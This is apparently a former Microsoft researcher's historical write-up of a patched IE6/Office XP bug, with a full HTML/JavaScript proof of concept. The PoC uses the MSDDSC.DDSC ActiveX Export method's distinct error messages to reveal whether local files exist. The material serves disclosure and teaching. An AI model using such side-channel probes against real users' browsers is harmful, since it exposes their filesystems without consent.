I was looking at ActiveX controls that were marked safe for scripting but had interesting side channels. The MSDDSC.DDSC Dashboard Components control (installed with Office XP) exposed an Export method that accepted a file path. I found that depending on which error it threw, you could determine whether a local file existed — without actually reading the file. This was a pure information disclosure, limited to systems with IE6 and Office XP installed.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE6_CheckIfLocalFileExists</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>IE6_CheckIfLocalFileExists</h2>
</center>
<hr />
<b>Note:</b> This bug works only on <u>IE6 when Office XP is installed</u>.<br /><br />
Type a fileName and we will check if it exists or not:<br /><br />
<input type="text" size="50" value="c:\windows\system32\sol.exe" id="fileName"> <input type="button" value="Check if Exists" onclick="checkIfExists()"><br /><br />
<hr />
<br />
We are using the Export method from the MSDDSC.DDSC (Dashboard Components MSDDSC.DLL) ActiveX. We simply use a fileName as the argument, and depending on the error raised, we know
if the file exists or not.<br /><br />
<b>
dashBoard = new ActiveXObject("MSDDSC.DDSC");<br />
dashBoard.Export(Full_Path_To_The_FileName);<br />
</b>
<br />
If the file exists, we get an "Invalid pointer" error, which -basically- means that the second parameter of the Export method is invalid.<br />
If it does not exist, we get "The system cannot locate the resource specified" error, which means that the file does not exist.<br />
<script language="JavaScript">
window.onerror = function(desc)
{
// "The system cannot locate the resource specified."
if (desc.indexOf("resource") != -1)
{
alert("File not found");
}
// "Invalid pointer." (It means that the file exists, but the second parameter of the Export method is invalid.
else
{
alert("File Exists!!");
}
return true;
}
function checkIfExists()
{
// This will raise an error and depending on it, we will know if the file exists or not.
dashBoard.Export(document.all.fileName.value);
}
// Init dashBoard ActiveX and make sure that we can load it.
var dashBoard = false;
try
{
dashBoard = new ActiveXObject("MSDDSC.DDSC");
}
catch(e){}
if (!dashBoard)
{
alert("It seems that the DashBoard ActiveX is not loadeable.\n\nAre you sure that you are on a system with IE6 and OfficeXP installed?");
}
</script>
</font>
</body>
</html>The Export method on MSDDSC.DDSC was designed to export dashboard data to a file, so it tries to open the path it is given. When the file exists, the control opens it successfully but then fails with “Invalid pointer” because the remaining parameters are missing — which is a different error than when the file simply cannot be found (“The system cannot locate the resource specified”). By catching these two distinct error strings in window.onerror, a web page could enumerate the filesystem one path at a time. The control was marked safe for scripting despite having this observable side channel.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.